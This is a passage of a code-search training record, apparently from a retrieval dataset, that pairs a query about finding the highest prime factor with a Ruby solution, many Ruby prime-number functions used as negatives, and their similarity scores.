even)\n\n end # if outter most\n\n i += 1\n end # while\n\n p array\n return array\n\nend",
"def first_n_primes(n)\n\n #unless n.is_a? Integer\n # return \"n must be an integer.\"\n #end\n return \"n must be an integer.\" unless n.is_a? Integer\n\n #if n <= 0\n # return \"n must be greater than 0.\"\n #end\n return \"n must be greater than 0.\" if n <= 0\n \n #prime_array = [] if prime_array.nil?\n prime_array ||= []\n \n prime = Prime.new\n #for num in (1..n)\n # prime_array.push(prime.next)\n #end\n # n.times { prime_array.push(prime.next) }\n n.times { prime_array << prime.next }\n \n #return prime_array\n prime_array # implicit return!\n\nend",
"def smallest_prime_factors(max)\n arr = Array.new(max+1)\n for n in 2...arr.count\n next if arr[n] # n.prime?\n for i in (n...arr.count).step(n)\n arr[i] = n unless arr[i]\n end\n end\n arr\nend",
"def specific_prime(n)\n\na = (2..n) # list of integers 2 through \nprimes = Array.new\n\nprimes = a.select { |x| (2..Math.sqrt(x)).none? { |d| (x % d).zero? }}\n\nputs primes[10000]\n# answer => 104,743\n\nend",
"def select_primes(array)\n array.select { |num| is_prime?(num) }\nend",
"def prime?(num)\r\n # your code goes here\r\n prime = []\r\n\r\n for i in 1 .. num\r\n if num % i == 0\r\n prime << i\r\n end\r\n end\r\n prime.length == 2\r\nend",
"def prime_factors(num)\n arr = []\n (1...num).each do |number|\n if is_prime(number) && num % number == 0\n arr << number\n end\n end\n return arr\nend",
"def primes\n Prime::EratosthenesGenerator.new.take_while {|i| i <= @base}\n end",
"def prime_factors(num)\n arr = []\n\tPrime.each(num) { |prime| num % prime == 0 ? arr.push(prime) : false }\n return arr\nend",
"def getMaxPrime(numb)\n def isPrime(n)\n return false if n <= 1\n 2.upto(Math.sqrt(n).to_i) do |x|\n return false if n%x == 0\n end\n true\n end\n\n primes = []\n (2..10000).each { |x| primes << x if isPrime(x) }\n \n max = 0\n primes.each do |i|\n if numb % i == 0\n max = i\n end\n end\n puts max\nend",
"def primes_array(options = {})\n limit = options[:limit] || ARRAY_DEFAULT_LIMIT\n field = Array.new(limit+1, true)\n # sieve the number field\n 3.step(field.size / 2, 2) do |k|\n (3 * k).step(field.size, 2 * k) do |n|\n field[n] = false\n end\n end\n \n # collect the field into an array, starting with 3\n primes = [ 2 ]\n 3.step(field.size, 2) do |n|\n primes << n if field[n] \n end\n primes\n end",
"def squared_primes(array)\n array.find_all{|x| (2..x-1).select(){|i| x % i == 0}.count == 0 && x > 1}.map{|p| p*p}\n\n\n # primes = []\n # array.each do |x|\n # 2.upto(x-1) do |i|\n # if x % i == 0 && x > 2\n # primes << x*x\n # end\n # end\n # end\n # primes\n\n # primes= []\n # array.find_all do |x|\n # if x == 2\n # primes << 2*2\n # end\n\n # if x > 2 && (x % 2 != 0)\n # #(2..x-1).select()\n # # if x % 2 != 0 && x > 1\n # #{|i| x % i == 0}\n # #x.count == 0 && x > 1\n # primes << x * x\n # #end\n # end\n # end\n # # new_array.map{|p| p*p}\n # primes\nend",
"def anti_prime?(n)\n div_arr = []\n (1..n).each do |num|\n div_arr << num_divisors(num) \n end\n return true if div_arr.max == div_arr[-1]\n return false\nend",
"def prime_factors(num)\n arr = factors(num)\n new_arr = []\n arr.each do |n|\n new_arr << n if prime?(n)\n end\n new_arr\nend",
"def primeArray(number)\n @sieve = Array.new(number)\n \n for count in 2..Math.sqrt(number)\n next if @sieve[count]\n \n for inner_count in 2..number/count\n @sieve[count * inner_count] = true\n end\n end\n @sieve\nend",
"def prime_numbers(num)\n all_factors = factors(num)\n only_prime = []\n i = 0\n while i < all_factors.length\n if prime?(all_factors[i])\n only_prime += all_factors[i]\n end\n i += 1\n end\n only_prime\n end",
"def find_primes(int1, int2)\n nums = (int1..int2).to_a\n nums.select { |num| is_prime?(num) }\nend",
"def prime?(number)\n a = []\n n = (2...number).to_a\n if number == 1 || number == 0 || number.negative?\n false\n else\n n.collect {|x| a << number % x}\n if a.include?(0)\n false\n else\n true\n end\n end\n # (2...number).to_a.each {|x| (number/x).integer? ? false : true}\nend",
"def primes_less_than(n)\n arr = []\n n-=1\n while n>1 do\n if is_prime?(n)\n arr << n\n end\n n-=1\n end\n arr.sort\nend",
"def primes_upto( xmax )\n # primes have no factors except for 1 and self\n primes = [ 2 ]\n ( 3..xmax ).each do |i|\n puts i if 0 == ( i % 1000 )\n is_prime = true\n primes.each do |p|\n break if p > ( i / 2 )\n if 0 == ( i % p )\n is_prime = false\n break\n end\n end # p\n primes << i if is_prime\n end # i\n return primes\nend",
"def pick_primes(numbers)\n\tprimes = []\n \tnumbers.each do |num| \n \tif isPrime(num) \n \tprimes.push(num)\n end\n end\n \treturn primes\nend",
"def prime_sieve(limit)\n \n limitn = limit+1\n primes = []\n \n # Fill in prime truth table\n for i in 0..limitn do\n primes[i] = true\n end\n \n primes[0] = false\n primes[1] = false\n \n primes.each_with_index{|prime,i|\n unless i < 2\n range = Range.new(i*i,limitn)\n range.step(i) {|index| primes[index] = false}\n end\n }\n \n true_primes = []\n primes.each_with_index{|value,i|\n true_primes << i if value == true\n }\n \n return true_primes\n \nend",
"def primesInRange(low, high)\n\n\t# Compute all primes smaller or equal to\n\t# square root of high using simple sieve\n\n\tlimit = (Math.sqrt(high)) + 1;\n\tsimpleSieve(limit);\n\n\t# Count of elements in given range\n\tn = high - low + 1;\n\n\t# Declaring boolean only for [low, high]\n \tmark = initArray((n+1));\n\n\t# Use the found primes by\n\t# simpleSieve() to find\n\t# primes in given range\n\t$prime.each_with_index do |val, i|\n\t\t# Find the minimum number in [low..high] that is\n\t\t# a multiple of prime[i] (divisible by prime[i])\n\t\tloLim = low / val * val\n\t\tif loLim < low\n\t\t\tloLim += val;\n\t\tend\n\t\tif loLim==val\n\t\t\tloLim += val;\n\t\tend\n\n\t# Mark multiples of prime[i] in [low..high]:\n\t#\tWe are marking j - low for j, i.e. each number\n\t#\tin range [low, high] is\tmapped to [0, high - low]\n\t#\tso if range is [50, 100] marking 50 corresponds\n\t#\tto marking 0, marking 51 corresponds to 1 and\n\t#\tso on.\n # Also if the current j is prime don't mark\n\t#\tit as true.In this way we need to allocate space only\n\t#\tfor range\n\tj = loLim;\n\t\tuntil j > high do\n\t\t if j != val\n\t\t mark[j - low] = true;\n\t\t end\n\t\t j += val\n\t\tend\n\tend\n\n\t# Numbers which are not marked\n\t# in range, are prime\n\to = []\n\tfor i in low..high do\n if mark[i - low]==false\n o.push(i);\n end\n end\n puts(\"[OUTPUT] %s\" % o.join(\",\"));\nend",
"def prime_range(min, max)\n\nend",
"def eratosthenes_sieve(max_number)\n numbers = (0..max_number+1).to_a\n bound = Math.sqrt(max_number).to_i\n\n (2..bound+1).each do |current|\n if numbers[current]\n (current+current..max_number+1).step(current).each do |j| numbers[j] = nil end\n end\n end\n\n return numbers.compact![2..-1]\nend",
"def prime?(int)\r\n\r\n arr = [] # empty array to store results\r\n\r\n i = 4 # modulo of 4 for ints 1, 2 and 3 are never zero\r\n while i < int # iteration to check\r\n arr << i if int % i == 0\r\n i += 1\r\n end\r\n\r\n arr.length == 0 # result \"true/false\"\r\nend",
"def is_prime?(a)\n max = a -1\n [*(2..max)].each do |val|\n if a % val == 0\n return false\n end\n end\n true\n end",
"def prime?(num)\n if num <= 1\n false\n elsif num == 2 || num == 3\n true\n elsif num > 3\n list_array = (2..num-1).to_a\n list_array.none? { |i| num % i == 0 }\n end\nend",
"def prime_number(n)\n prime_array = []\n count = 1\n until prime_array.length == n\n if count == 1\n prime_array << 2\n count += 2\n elsif is_prime?(count) == true\n prime_array << count\n count += 2\n else\n count += 2\n end\n end\n prime_array.last\nend",
"def isPrime?(num)\n return false if num < 2\n\n (2...num).each { |factor| return false if num % factor == 0}\n\n true\nend",
"def isprime?(num)\n\n return false if num<2\n\n (2...num).each do |factor|\n return false if num % factor == 0\n end\n\n return true\n\nend",
"def squared_primes(array)\n# array.find_all {|x| (2..x-1).select(){|i| x % i == 0 }.count == 0 }.map{|p| p*p}\n# Select only primes from array\n\tprime = array.find_all do |x|\n\t\t\t\t \t(2..x-1).select do |i|\n\t\t\t\t \t\tx % i == 0\n\t\t\t\t \tend\n\t\t\t\t \t.count == 0\n\t\t\t\t\tend\n# Square the selected primes and over write the initial array \n return prime.map {|p| p*p}\n \nend",
"def prime_factors(num)\n array = []\n (1..num).each do |number|\n array << number if prime?(number) && num % number == 0\n end\n array.sort!\nend",
"def pick_primes(numbers)\n numbers.select { | n | is_prime(n) }\nend",
"def pick_primes(numbers)\r\n return numbers.select { |num| prime?(num)}\r\nend",
"def primes(top)\n n = 2\n primes = []\n loop do\n primes << n if (2..Math.sqrt(n)).all? {|x| n % x != 0 }\n return primes.last if primes.count == top\n n += 1\n end\nend",
"def sieve_of_eratosthenes(max)\n if max < 1 || !(max.is_a?(Integer))\n raise TypeError.new \"the number given must be an integer greater than zero\"\n end\n\n root = Integer.sqrt(max)\n primes = Array.new(max + 1) { |i| i.odd? || i == 2 } #every prime number other than 2 is an odd number.\n\n #to find all the prime numbers until max, it will be enough just to perform the sifting only by the prime numbers, which do not exceed the root of max.\n 3.step(root, 2).each do |i|\n next unless primes[i] # next if not initialized as prime\n #i*i, i*i+i, i*i+2i, i*i+3i\n (i * i).step(max, i) do |j|\n primes[j] = false\n end\n end\n\n #Select all prime numbers\n 2.upto(max).select { |i| primes[i] }\nend",
"def prime?(primes,x)\n lim = Math.sqrt(x)\n primes.each do |p|\n return true if p > lim\n return false if x % p == 0\n end\n return true\nend",
"def primes_less_than number\n ps = (2..number).each\n primes_so_far = []\n enum = Enumerator.new do |y|\n loop do\n p = ps.next\n non_prime = false\n\n p_root = (p**0.5).floor\n # Filter for primes using an inverted version of the sieve of\n # Eratosthenes--a number is prime if it's not divisible by the primes\n # less than it's square root.\n primes_so_far.each {|prime|\n if prime > p_root\n # if p has no divisors in primes_so_far less than p^0.5\n # then p must be prime\n break\n elsif p % prime == 0\n # the current p is not prime\n non_prime = true\n break\n end\n }\n\n unless non_prime\n primes_so_far.push p\n y.yield p\n end\n end\n end\n\n enum.to_a\n\nend",
"def is_prime?(num)\n return false if num == 1 #added gaurd clause after watching walkthrough\n (2..(num - 1)).select do |x| #refactored to remove range variable\n return false if num % x == 0\n end\n return true #moved the this return to solve is_prime?(2) while watching video\nend",
"def find_primes\n canidates = (0..@max_num).to_a\n k=2\n while(k<= canidates.size/2)\n j=2\n while(j<= canidates.size/2)\n prod = k*j\n if prod <= @max_num\n canidates[prod] = nil\n end\n j+=1\n end\n k+=1\n end\n res = canidates.compact\n res.shift(2)\n res\n end",
"def primes(num)\n \nend",
"def primes(num)\n \nend",
"def primes(num)\n \nend",
"def primes(num)\n \nend",
"def pick_primes(numbers)\n numbers.select { |num| prime?(num) }\nend",
"def prime_numbers\n # start with the first prime number\n primes = [2]\n # find the rest of the prime numbers\n (2..1000).each do |i|\n add_next_prime_number(primes)\n end\n return primes\nend",
"def is_prime?(num)\n # Write your code here\n # (1..num).select { |element| num % element == 0 }.length == 2 ? true : false\n\n return false if num < 2\n\n (2...num).each do |factor|\n if num % factor == 0\n return false\n end\n end\n return true\nend",
"def pick_primes(numbers)\n return numbers.select { |num| prime?(num)}\nend",
"def is_prime?(num)\n return false if num <= 1\n\n (2...num).each do |fact|\n return false if num % fact == 0\n end\n\n true\nend"
] |
[
"0.83949995",
"0.83949995",
"0.8016834",
"0.7953333",
"0.7952573",
"0.78910017",
"0.78560436",
"0.7841761",
"0.78091115",
"0.78061825",
"0.78059363",
"0.7792239",
"0.7710655",
"0.7699948",
"0.76808125",
"0.76653236",
"0.7654771",
"0.7654771",
"0.7654771",
"0.75961375",
"0.7559373",
"0.75291616",
"0.75243264",
"0.7486323",
"0.7468632",
"0.74616057",
"0.7452698",
"0.73809785",
"0.73729825",
"0.735041",
"0.7343364",
"0.7339515",
"0.7335261",
"0.7330846",
"0.7329084",
"0.7319689",
"0.73078823",
"0.7295502",
"0.7279627",
"0.7266765",
"0.723547",
"0.7230819",
"0.7224456",
"0.72076565",
"0.72014487",
"0.7199867",
"0.7199867",
"0.7193629",
"0.7174334",
"0.71709913",
"0.715567",
"0.71537316",
"0.7152749",
"0.7123376",
"0.71190906",
"0.71042836",
"0.7077767",
"0.70665973",
"0.70508856",
"0.70281065",
"0.7023829",
"0.70226556",
"0.7014978",
"0.70006895",
"0.6991797",
"0.69907314",
"0.6988749",
"0.6960299",
"0.69592774",
"0.6958428",
"0.6948659",
"0.69464284",
"0.69421273",
"0.69329214",
"0.6931158",
"0.6929275",
"0.69266766",
"0.6922709",
"0.6913232",
"0.6912049",
"0.6893453",
"0.6889751",
"0.6887555",
"0.68791026",
"0.6878495",
"0.6873528",
"0.68717384",
"0.6866335",
"0.68656665",
"0.6863504",
"0.68606424",
"0.6858261",
"0.6858261",
"0.6858261",
"0.6858261",
"0.68513167",
"0.6849174",
"0.6848442",
"0.6847705",
"0.68473995"
] |
0.86498326
|
0
|
write a recursive function to find the highest prime factor of any number
|
def prime_recur(num)
max_prime = 2
i = num
while i > (num/2)
if is_prime?(i)
max_prime = i
end
i -= 1
end
max_prime
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def largest_prime_factor(num)\n (2..num).reverse_each do |factor|\n if (num % factor == 0 && Prime.prime?(factor))\n return factor\n end\n end\nend",
"def largest_prime_factor(num)\n track = 0\n (num).downto(2).each do |factor|\n \n if num % factor == 0 && prime?(factor)\n return factor\n end\n end\n \nend",
"def largest_prime_factor(num)\n num.downto(1).each do |divisor|\n if num % divisor == 0 && isprime?(divisor)\n return divisor\n end\n end\n return 1\nend",
"def largest_prime_factor(num)\n num.downto(1) do |n|\n if num % n == 0 && prime?(n)\n return n\n end\n end\nend",
"def largest_prime_factor(num) \n num.downto(2).each do |factor|\n if num % factor == 0 && isPrime(factor)\n return factor\n end\n end\nend",
"def largest_prime_factor(num)\n (1..num).reverse_each do |factor|\n if num % factor == 0 && prime?(factor)\n return factor\n end\n end\nend",
"def largest_prime_factor(num)\n i = num\n while i > 0\n if num%i == 0 && prime?(i)\n return i\n end\n i -= 1\n end\nend",
"def largest_prime_factor(num,prime_factors,recursive)\n candidate = 2\n until candidate >= Math.sqrt(num)\n recursive = false\n if num % candidate == 0\n num = num / candidate\n recursive = true\n prime_factors << candidate\n largest_prime_factor(num,prime_factors,recursive)\n end\n break if recursive\n candidate == 2 ? candidate += 1 : candidate += 2\n end\n prime_factors << num unless recursive\n prime_factors.last\nend",
"def largest_prime_factor(num)\n i = num - 1\n\n while i > 1 \n if is_prime?(i) && num % i == 0\n return i \n end\n i -= 1\n end\n \n num\nend",
"def largest_prime_factor(num)\n i = num - 1\n while i >= 2\n if num % i == 0 && is_prime?(i) == true\n return i\n end\n i -= 1\n end\n num\nend",
"def largest_prime_factor(number)\n factor = 1\n\n while factor <= number\n if number % factor == 0\n return number / factor if is_prime?(number / factor)\n end\n factor += 1\n end\nend",
"def largest_prime_factor(num)\n return nil if num <= 1\n (2..num).reverse_each do |n|\n return n if prime?(n) && num%n == 0\n end\nend",
"def largest_prime_factor(num)\n num.downto(2) do |i|\n return i if (num % i).zero? && prime(i)\n end\nend",
"def largest_prime_factor(num)\n\n def prime?(num)\n return false if num < 2\n\n (2...num).each do |n|\n if num % n == 0\n return false\n end\n end\n\n true\n end\n\n if prime?(num)\n return num\n end\n\n (num.downto(2)).each do |i|\n if prime?(i) && num % i == 0\n return i\n end\n end\nend",
"def largest_prime_factor(num)\n divisor = 1\n\n (2..num).each do |i|\n if num % i == 0 && is_prime?(i)\n divisor = i\n end\n end\n\n divisor\nend",
"def largest_prime_factor\n number = 600851475143\n n = 2\n while n < number\n if number % n == 0\n factor = number / n\n return factor if is_prime?(factor)\n end\n n += 1\n end\nend",
"def get_largest_prime_factor num\n get_largest_number(prime_factor_numbers(num))\nend",
"def max_prime_factor(num)\n return num if num == 1 || num < 1\n max_num = (num ** 0.5 + 1).to_i\n f = (2..max_num).find { |x| num % x == 0 } || num\n [f, max_prime_factor(num / f)].max\nend",
"def largest_prime_factor (num)\n largest = 1\n (2..num).each do |ele|\n if num % ele == 0 && prime?(ele) && largest < ele\n largest = ele\n end\n end\n return largest\nend",
"def highest_prime_of(factors)\n factors.each do |factor|\n if check_prime(factor)\n return factor\n end\n end\nend",
"def largest_prime_factor(num)\n return num if prime?(num)\n\n prime_factors(num).max\nend",
"def largest_prime_factor(input)\n\n prime = input\n (2..Math.sqrt(input).to_i).each do |i|\n break if prime <= 1\n prime /= i while (prime > i && prime % i == 0)\n end\n prime\nend",
"def largest_prime_factor(num)\n lnum = nil\n (2..num).each do |factor|\n if num % factor == 0 && prime?(factor)\n lnum = factor\n end\n end\n lnum\nend",
"def largest_prime_factor(num)\n counter = 2\n biggestFactor = 0\n while (counter * counter) <=num\n if num % counter == 0\n num = num / counter\n biggestFactor = counter\n else\n counter+=1\n end\n end\n\n if (num > biggestFactor)\n biggestFactor = num\n end\n biggestFactor\nend",
"def largest_prime_factor num\n divisors = []\n max = 0\n\n (1..num).each { |el| divisors << el if num % el === 0 && isPrime(el)}\n\n max = divisors[0]\n\n divisors.each do |el|\n max = el if el > max \n end\n\n max\nend",
"def largest_prime_factor(number)\n prime = 2\n max = 1\n while (prime <= number)\n if(number % prime == 0)\n max = prime\n number = number/prime\n else\n prime += 1\n end\n end\n max\nend",
"def largest_prime_factor(num)\n big = 0\n prime = 0\n \n return false if num < 2\n\n # num is the only prime\n return num if prime?(num)\n \n # loops in reverse and returns the largest and first divisible prime\n j = num - 1\n while j > 1\n if num % j == 0 && prime?(j)\n return j\n end\n j -= 1\n end\nend",
"def largest_prime_factor_of(num)\n max = num\n test = 3\n best = 1\n\n while (max >= test) do\n if max % test == 0\n best = test\n max = max / test\n else\n test += 2\n end\n end\n best\nend",
"def find_highest_prime_factor(n)\n # Read http://joezack.com/index.php/2009/01/15/project-euler-problem-3-in-ruby/ - which points out you can\n # stop searching at the square root of a number. Speedup!\n (Math.sqrt(n).ceil).downto 2 do |i|\n if n % i == 0 && find_highest_prime_factor(i) == 1\n return i\n end\n end\n 1\nend",
"def largest_prime_factor(num)\n (0..num).reduce { |acc, n| prime?(n) && (num % n).zero? ? n : acc }\nend",
"def largest_prime_factor(n)\n recursive_prime_factors(n)\n PRIMES.keys.sort().last\nend",
"def largest_prime_factor(number)\n # divide by the smallest prime number (2) until\n # number is no longer divisble by the given prime number\n\n # iterate to the next (prime) number\n # divide and repeat\n # the forumula will return the largest prime factor\n\n prime_number = 2\n counter = 0\n\n while prime_number != number\n if number % prime_number == 0\n number /= prime_number\n else\n prime_number += 1\n end\n \n end\n prime_number\nend",
"def largest_prime_factor(number)\n\tlargest_pfactor = number\n\tfactor = 2\n\twhile(factor <= (largest_pfactor / 2)) do\n\t\tif(largest_pfactor % factor == 0)\n\t\t\tlargest_pfactor = largest_pfactor / factor\n\t\telse\n\t\t\tfactor = factor + 1\n\t\tend\n\tend\n\tlargest_pfactor\nend",
"def largest_prime_factor(num)\n num.prime_division.last[0]\n end",
"def prime_factors(num)\n factors = num.prime_division\n factors.to_a\n largest_factor = factors[-1][0]\n p largest_factor\nend",
"def largest_prime_factor(n)\n divisor = 2\n while(divisor <= n)\n n%divisor == 0 ? n = n/divisor : divisor += 1\n end\n divisor\nend",
"def largest_prime_factor(num)\n factors = []\n half_of_num = num / 2\n\n (2..half_of_num).each do |factor|\n if num % factor == 0\n factors << factor\n num = num / factor\n end\n end\n factors.max\nend",
"def largest_prime_factor(num)\n\ti=2 \n\tquotient = 0\n\twhile(quotient != 1) do\n\t\ti +=1\n\t\tif(is_prime?(i) && (num % i == 0))\n\t\t\tdivisor = quotient == 0 ? num : quotient\n\t\t\tquotient = divisor / i\n\t\tend\t\n\tend\n\treturn i \nend",
"def largestPrimeFactor(num)\n\t(2..num).each do |n|\n\t\treturn num if num <= n\n\t\tnum /= n if (num > n && num % n == 0)\n\tend\nend",
"def largest_prime_factor(num)\n divisors = []\n (2..num).each do |divisor|\n if num % divisor == 0\n if prime?(divisor)\n divisors << divisor\n end\n end\n end\n divisors[-1]\nend",
"def largest_prime_factor(n)\n i = 2\n largest = 0\n while i <= n\n if n % i == 0\n while n % i == 0\n n = n / i\n largest = i\n i += 1\n end\n end\n i += 1\n end\n return largest\nend",
"def largest_prime_factor(n, r = [])\n prime = Prime.lazy\n r = r || []\n if n.prime?\n r << n\n return r\n else\n factor = prime.find { |j| n % j == 0 } # 用find,找到第一个就结束\n r << factor\n prime.rewind\n largest_prime_factor (n / factor), r\n end\n r.max\nend",
"def largest_prime_factor(num)\n factors = (1..num).select { |factor| num % factor == 0}\n large_prime = factors.reverse.select { |i| return i if prime?(i)}\nend",
"def largest_prime_factor(num)\n primes = []\n (1..num).each do |n|\n primes << n if num % n == 0 && is_prime?(n)\n end\n primes.max\nend",
"def largest_prime_factor(num)\n factors = []\n\n (1..num).each do |i|\n if num % i == 0\n factors << i \n end\n end\n\n primes = []\n factors.each do |num|\n if is_prime?(num)\n primes << num \n end\n end\n\n primes.max\nend",
"def largest_prime_factor(num)\n prime_factors = []\n (2..num).each do |n|\n prime_factors << n if prime?(n) && num % n == 0\n end\n prime_factors[-1]\nend",
"def largest_prime_factor(num)\n return nil if num < 2\n (1..num).inject do |acc, fact|\n if num % fact == 0 && prime?(fact) && fact >= acc\n fact\n else\n acc\n end\n end\nend",
"def largest_prime_factor(num)\n largest = num\n variable_num = 2\n\n while variable_num < largest\n while largest % variable_num == 0 && largest != variable_num\n largest = largest / variable_num\n end\n variable_num += 1\n end\n return largest\nend",
"def largest_prime_factor( x ) \n require 'mathjb'\n primes = primes_below(x)\n i = 0\n \n until primes.include?(x)\n div = primes[i]\n if x % div == 0 then\n x /= div #if div is a factor of x, set x to x / div\n i = 0\n else\n i += 1\n end\n end\n return x\nend",
"def largest_prime_factor(input)\n factors = []\n (1..input).each do |x|\n if input % x == 0\n factors << x\n x += 1\n else\n x == input\n break\n end\n end\nend",
"def largest_prime_factor n\n max_prime = -1\n i = 3\n # check if n is product of 2's. then the max prime is 2. and n will be 1 at the end.\n while n % 2 == 0\n max_prime = 2\n n /= 2\n end\n\n #if n is produc of 3's , then the max prime is 3, and n will be 1 at the end.\n #if n is not product of 3's, it contains other prime factors. these factors must be greater\n #than 3 because we alreay excluded 2's in the previous step. and we have excluded 2's multiples in the\n #previous steps, so only need to check the odd numbers for possible factors.\n while i*i <= n\n while n % i == 0\n max_prime = i\n n /= i\n end\n i += 2\n end\n\n if n > 2\n max_prime = n\n end\n max_prime\nend",
"def largest_prime_factor(num)\n \n (1..num).inject do |largest_factor, factor|\n if num % factor == 0 && prime?(factor)\n largest_factor = factor\n else\n largest_factor\n end\n end\nend",
"def largest_prime_factor(input)\n lpf = 2\n\n while lpf < input\n\n if input % lpf == 0\n\n input = input / lpf\n lpf = 2\n else\n lpf += 1\n end\n end\n\n return lpf\nend",
"def largest_factor(number)\n result = prime_factors(number).sort\n result[-1]\nend",
"def largest_prime_factor(num)\n puts \"num = #{num}\"\n Prime.first(num).select {|i| i}\nend",
"def greatest_prime_factor(n)\n return false if n < 1\n divisor = Math.sqrt(n).floor\n\n while divisor>=2\n return divisor if prime?(divisor) && n%divisor==0\n divisor-=1\n end\n return false\nend",
"def largest_factor(n)\n\n result = nil\n (1 .. n/2).each do |d|\n if n % d == 0\n result = d\n end\n end\n\n result\nend",
"def my_largest_prime(num)\n counter = 2\n until num == 1\n if num % counter == 0\n sol = counter\n num /= counter\n else\n counter += 1\n end\n end\n return sol\nend",
"def largestPrimeFactor\n\tn = 600851475143\n\tfactor = 2\n\tlastFactor = 1\n\n\twhile n > 1\n\t\tif n % factor == 0\n\t\t\tlastFactor = factor\n\t\t\tn /= factor\n\t\t\twhile n % factor == 0\n\t\t\t\tn /= factor\n\t\t\tend\n\t\tend\n\n\t\tfactor += 1\n\tend\n\n\tputs(lastFactor)\nend",
"def greatest_factor(num)\n (2...num).reverse_each { |i| return i if num % i == 0}\nend",
"def three num\n max = 0\n acc = 1\n for i in 2..num\n if num % i == 0 #first check if i divides the number\n if isPrime?(i) #then check if it is prime (part of the prime factorization)\n max = i #keep the max so far\n temp = num #this loop is for numbers made up of many of the same prime i.e. 2^32\n while (temp % i == 0)\n temp = temp / i\n acc = acc * i\n if acc == num\n return max\n end\n end\n end\n end\n end\n return max\nend",
"def largest_prime_factor(input)\n prime = input\n (2..Math.sqrt(input).to_i).each do |i|\n # Here we use the square root function to cut our range down drastically\n break if prime <= 1\n while (prime > i && prime % i == 0) do\n prime /= i\n puts \"prime - #{prime}, i - #{i}\"\n end\n end\n prime\nend",
"def larget_prime_factor(n)\n temp = n\n largest = 0\n div = 2\n\n while temp >= div * div\n if temp % div == 0\n temp /= div\n else\n div += 1\n end\n end\n\n largest = temp if temp > largest\n return largest\nend",
"def largest_prime(int)\n def is_prime?(int)\n div = 2\n until div >= int\n return false if int % div == 0\n div += 1\n end\n true\n end\n remainder = int\n divider = 2\n prime_factors = []\n while divider < remainder\n if remainder % divider == 0 && is_prime?(divider)\n prime_factors << divider\n remainder /= divider\n end\n divider += 1\n end\n prime_factors << remainder\n puts prime_factors\n prime_factors.max\nend",
"def largest_prime_factor(number)\n\tfactors = []\n\n\t(1...number).each do |i| \n\t\tif number % i == 0 && Prime.prime?(i)\n\t\t\tfactors.push(i)\n\t\tend\n\tend\n\tfactors.last\nend",
"def largest_prime_factor(current_number)\n\tprime_factors = []\n\ti = 2\n\twhile current_number > 1\n\t\twhile current_number % i == 0\n\t\t\tprime_factors << i\n\t\t\tcurrent_number /= i\n\t\tend\n\t\ti += 1\n\tend\n\treturn prime_factors.last\nend",
"def largest_prime(number)\n is_prime = false\n current_num = number\n divisor = 2\n max_prime = 1\n\n while is_prime != true && divisor <= current_num\n if current_num % divisor === 0\n current_num /= divisor\n if divisor > max_prime\n max_prime = divisor\n end\n divisor = 2\n else\n divisor += 1\n end\n\n if divisor > current_num\n is_prime = true\n end\n end\n\n puts max_prime\n return max_prime\nend",
"def highest_prime_number_under(number)\n\nend",
"def find_largest_prime(n)\n while true\n smallest_prime = find_smallest_prime(n)\n if smallest_prime < n\n n /= smallest_prime\n else\n return n\n end\n end\nend",
"def primeFactors(x)\n\tlargestFactor = 1\n\tcurrentFactor = 1\n\twhile currentFactor <= x # limit of the problem\n\t\tif x % currentFactor == 0 \n\t\t\tx = x / currentFactor\n\t\t\tif currentFactor > largestFactor\n\t\t\t\tlargestFactor = currentFactor\n\t\t\t\tcurrentFactor = 0\n\t\t\tend\n\t\tend\n\t\tcurrentFactor += 1\n\tend\n\treturn largestFactor\nend",
"def largest_prime(number)\r\n limit = Math.sqrt(number).floor \r\n (2..limit).select { |n| number % n == 0 && Prime.prime?(n) }.max\r\nend",
"def prime?(integer)\nn = integer\nif n < 1 then raise ArgumentError.new(\"Positive integers only\")\nend\nlargest_factor = nil\nfor i in 2..(n/2)\n\tif (n % i) == 0\n\t\tlargest_factor = i\n\tend\nend\n\nlargest_factor ||= n \nend",
"def prime_factor\n max = 600851475143**0.5\n\n for i in (1..max).step(2)\n if 600851475143 % i == 0\n if is_prime(i)\n ans = i\n end\n end\n end\n ans\nend",
"def highest_prime_number_under(number)\n until is_prime?(number)\n number -= 1\n end\n number\nend",
"def largest_prime(num)\n largest_prime = 0\n i = 2\n while i * i <= num\n if num % i == 0\n num /= i\n largest_prime = i\n else\n i += 1\n end\n end\n\n if num > largest_prime\n largest_prime = num\n end\n\n largest_prime\nend",
"def largest_prime_number(upper)\n answer = 2\n point = 3\n divisor = upper\n\n divisor /= 2 while divisor.even?\n\n while divisor != 1\n while (divisor % point) == 0\n answer = point\n divisor /= point\n end\n point += 2\n end\n answer\nend",
"def highest_prime_number_under(number)\n highest_prime = 0\n for num in 1..number\n if is_prime?(num) && num > highest_prime\n highest_prime = num\n end\n end\n return highest_prime\nend",
"def largest_prime_factor(num)\n #prime_division returns an array of 2 element arrays containing prime factorization - [[2, 1], [5, 2]]\n #flat_map contatenates the 2 element arrays into a single array [2, 5, 5]\n array = Prime.prime_division(num).flat_map { |factor, power| [factor] * power }\n\n largest = 0\n array.each do |i|\n if i > largest\n largest = i\n end\n end\n return largest\nend",
"def highest_prime_number_under(number)\n counter = number\n number.times do\n if is_prime?(counter)\n p counter\n break\n else\n counter -= 1\n end\n end\nend",
"def highest_prime_number_under(number)\n highest_prime_number_under = 0\n ary = (number-1).downto(2).to_a\n ary.each do |x|\n counter = 0 \n (2..(x-1)).each do |num|\n if ( x % num ) == 0\n counter += 1\n else\n counter = counter\n end \n end \n \n if counter > 0 \n highest_prime_number_under = 0\n else \n highest_prime_number_under = x\n p \"The highest prime number under #{number} is \" + x.to_s\n break\n end\n end \nend",
"def find_largest_prime(integer)\n factor_array = []\n potential_factor_array = (2..integer).to_a\n potential_factor_array.each do |factor|\n if integer % factor == 0\n factor_array << factor\n end\n end\n largest_factor = factor_array.last\n potential_factor_array = (2..largest_factor).to_a\n potential_factor_array.each do |potential_factor|\n factor_array.each do |factor|\n if factor != potential_factor && factor % potential_factor == 0\n factor_array.delete(factor)\n end\n end\n end\n p factor_array.last\nend",
"def largest_prime(n) #600851475143\r\n p = 0\r\n i = 5\r\n nums = []\r\n while i*i < n\r\n if n % i == 0\r\n nums << i\r\n end\r\n\r\n i += 1\r\n end\r\n\r\n nums.reverse_each do |num|\r\n if prime?(num)\r\n return num\r\n end\r\n end\r\n\r\nend",
"def greatest_factor(num)\n\n return num / 2\n\nend",
"def print_primes(num)\r\n\tlargest_div = 2;\t\t\t\r\n\twhile num > 1\r\n\t\tdiv = 2;\r\n\t\twhile num % div != 0\r\n\t\t\t\tdiv += 1\r\n\t\tend\r\n\t\tnum = num / div\r\n\t\tlargest_div = div\r\n\tend\r\n\treturn largest_div\r\nend",
